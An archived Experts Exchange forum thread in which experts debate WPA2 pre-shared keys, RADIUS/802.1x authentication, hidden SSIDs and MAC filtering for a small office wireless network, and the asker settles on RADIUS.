Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win

x
?
Solved

Wireless security settings

Posted on 2010-09-15
17
Medium Priority
?
627 Views
Last Modified: 2013-12-27
We are in the process of looking into creating wireless access points on our network for 40 computers.  Can anyone provide advice as to the most appropriate wireless security settings and/or explain the pros and cons of the different options?
0
Comment
Question by:DHPBilcare
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 7
  • 5
  • 2
  • +3
17 Comments
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33686347
WPA 2 is strongest, having a authentication service like radius is best but a pre shared key also works well.  WEP can be cracked in a matter of seconds.  For 40 hosts I recommend having multiple lite weight APs with a controller, cisco and others offer these, so the hosts don't cross talk and the load can be distributed.  I would also no broadcast your ssid.  Does this help you?
0
 

Author Comment

by:DHPBilcare
ID: 33686440
It does thanks for the comment.  I am moving towatds WPA 2 with a shared key.

What wold I need for Radius?  Would I need a dedicated server?
0
 

Expert Comment

by:dusty_it
ID: 33686449
When designing a wireless network there many other parameters you have to take in account, not only security, please review your needs in terms of bandwidth per computer, where they are located (blind spots, walls, etc.).

Talking about wireless security you should choose WPA or WPA2 (better) with a long passphrase. WPA is vulnerable only to brute force dictionary attacks, if you choose a passphrase of, let's say, 30 characters (with digits, letters mixed uppercase and lowercase), your network should be sufficiently secured.
0
VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

 
LVL 1

Expert Comment

by:Robert Davis
ID: 33686474
Yes, you would need a dedicated server that would handle logins for each user which radius then uses to encrypt the traffic.  It is much more involved and more maintenance as well.  A good long wpa 2 psk with a good ssid that isn't broadcasting is bullet proof enough.  With any security, if someone wants in bad enough, no amount of security will stop them.

My concern would be how close to each other those 40 hosts are and how many APs in what locations you have, rather than the encryption.  Encryption can be changed fairly easily.  You may want to consider a consult for your hardware side if you haven't spent money already...
0
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33686488
Or just going with a much cheaper wired solution if possible,
0
 
LVL 12

Accepted Solution

by:
naykam earned 2000 total points
ID: 33688576
I would strongly recommend WPA2 enterprise using certificates and RADIUS authentication.

This is the ideal senario. If you have an active directory, then it could seamlessly integrate the wireless credentials into the user accounts.

Further to that, the use of certificates would make it just that more secure. There is a lot of documentation online in regards to 'wireless AD authentication / wireless radius authentication using IAS or NPS'.

> am moving towatds WPA 2 with a shared key.
>What wold I need for Radius?  Would I need a dedicated server?

The answer is no, you will not need radius for a pre-shared key. Your wireless hardware would support this natively. For WPA2 enterprise (in a nutshell) you need radius, as it handles the authentication hand shakes.

If you go for a pre-shared key, as mentioned, it will be sufficient for most practices. But it really comes down to how secure the rest of your network is. But the points of securing it with a long and complex (no dictionary words) key then you can at least say, that you 'have tried your hardest'. Hiding the SSID can become a pain in the backside, unless you have group policies that manage the wireless network profile for each computer. Hiding it really doesn't provide any more 'security' on the network, but it does stop random people trying to connect to it, and generating a large disallowed log file.

In my opinion, WPA enterprise is the only way to go. It may be a bit more to setup, but data integrity is key.
0
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33688842
You can crack WPA when you know the ssid and get a good packet sniff, not broadcasting greatly reduces this chance.  Having to deal with RADIUS, an authentication server/AD, and users login along with not all hosts/cards supporting enterprise has an arguably equal amount of issues over typing in an ssid once, or even posting it up on the wall like most datacenters.  We use radius with AD, but I sure as heck don't at home despite the data being just as sensitive.  I just use a mac filter table and don't broadcast with a PSK.

It sounds like this network is not very complex though, although it would be nice if you'd let us know what you'd like to accomplish.  I'm not trying to shy you away from RADIUS, it's a tried and proven system that a lot of businesses use with plenty of documentation.  If you want the most security, go RADIUS with LWAPs that have their signal strengths reduced so they don't broadcast outside.  But using a wired solution is MUCH cheaper...then you can use MAC port security to lock down your network from unauthorized users (which you can also do on your wireless controller).  Most users seem to spend a lot of time securing their wireless network, and not their wired.

Let us know what you want to accomplish, the sensitivity of the data you are passing wirelessly, and the reason you want to go wireless.  This will greatly help determine what route is best for you.  Also remember the best security you can apply is on the data itself via SSL, AES, and general safe practices (don't fall for phishing attempts etc.).  The media will always be your weakest point, as media is easy to passively tap, especially over the air.
0
 
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33689052
in regards to wireless and security, without a doubt go with Naykams solution.
You should never, never and never go with anythinh other than Radius/Tacacs (AD/Directory) authentication, authenticating both computer and users.

Why - because it's unbreakable.

Why not PSK:
- Pre shared keys leak. You tell 10 people the PSK, and within a couple of weeks - someone stopping by at the office, gets the PSK by someone, cause the need wireless - or someone else.
- When you change PSK - you need every single user to change PSK

With Radius - all wireless settings, and changes can be controlled through GPOs, every single computer has its own encryption key - and it changes regularly (when using WPA2) - so packet sniffing is wasted, you'll never get enough packets to hack the keys.

All other options;
Hiding SSID
MAC filters
- just more hassle and false security
0
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33690099
I beg to have you argue your point.  Hiding the SSIDs totally prevents passerby from sniffing from the outside world.  And if you have a packet sniff of the psk, and have the ssid, it's a matter of 17 minutes to crack it, radius is much further behind but of course crackable.  MAC filters on the other hand, are a lot safer.  Sure you can spoof...if you know what to spoof.  Coupled with pork security in sticky mode and your network is locked down with little effort done.  2 Minutes of work for exponentially higher security, sounds like a good trade off to me.
0
 
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690358
all legitimite packets sent in a network with a hidden SSID - contains the SSID in the header.
using inSSIDer, og any other free siffing software - will not tell you the SSID

Get a real wireless packet sniffer, you can EASILY pick ut the hidden SSID.
So much for security --- though it might prevent Brian, 14 yrs old next door - it will not prevent Brian 19yrs old - "hacker" with the ability to google ...

on what basis can you claim that a WPA2 encryption key is cracked within 17 minutes?
when cracking encryption keys, it's all about getting enough packets, which is easy enough for WEP - where key doesn't change, og WPA where all users can share key.
but with WPA2 - every single station has it's own key - changing like every 6 minutes -- happy hacking - Will not work, not even on a sunny day!
0
 
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690364
0
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33690431
Indeed, we use airmagnet in conjunction with kismet for site surveys.  As said a million times, there's always a way to crack it.  I don't see what your beef is with not broadcasting ssid or using mac filtering/port security when it really doesn't take any time to implement and drastically improves network security.  It's easy, for a noticeable gain, end of story.  In my experience cisco radius solutions and users having weak forgetful passwords cause way more issues then a forgotten ssid or mac change.  Just my $0.02
0
 
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690452
I've never said hiding SSID is wasted,
but it should be used together with Radius ---
I've might misunderstood you - thought you claimed that hiding SSID and mac filtering is better than RADIUS -- and of course, that's not the case.

You should always - when securing wireless - start with RADIUS/TACACS, everything else would come as an bonus
0
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33690483
Ah, if you read my first posts--radius is safer.  But for the op, it kind of comes down to what kind of operation this is and what his experience and budget is.  There are definitely times where PSK is far more practical, despite the increased risk, that's my only other point.  Cost, hardware, drivers, knowledge are a few concerns.
0
 
LVL 25

Expert Comment

by:madunix
ID: 33699427
read this http://www.linux-magazine.com/w3/issue/119/048-049_kurt.pdf
If you are looking for a cheap and secure wireless router setup, check out Tomato, DD-WRT, or OpenWrt.
0
 
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33700573
Still --- i wouldn't recommend anyone of deploying anything other than 802.1x secured wireless in a business environment ---
PSK, hiding SSID and mac filtering is less secure, and or high maintenance ...
And 802.1x with Win2008 NPS or Win 2003 IAS is fairly easy, and if you skip certificate deployment as well - and use only computer account with user re-authentication it's, if possible, easier --

0
 

Author Closing Comment

by:DHPBilcare
ID: 33727417
Thanks for the comments.

For us Security is the key and our parent company has insited on RADIUS authentication.  We have asked for an expert to come on site and look at what we will need going forward.
0

Featured Post

Looking for the Wi-Fi vendor that's right for you?

We know how difficult it can be to evaluate Wi-Fi vendors, so we created this helpful Wi-Fi Buyer's Guide to help you find the Wi-Fi vendor that's right for your business! Download the guide and get started on our checklist today!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

An overview of cyber security, cyber crime, and personal protection against hackers. Includes a brief summary of the Equifax breach and why everyone should be aware of it. Other subjects include: how cyber security has failed to advance with technol…
Tech spooks aren't just for those who are tech savvy, it also happens to those of us running a business. Check out the top tech spooks for business owners.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Is your data getting by on basic protection measures? In today’s climate of debilitating malware and ransomware—like WannaCry—that may not be enough. You need to establish more than basics, like a recovery plan that protects both data and endpoints.…

610 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question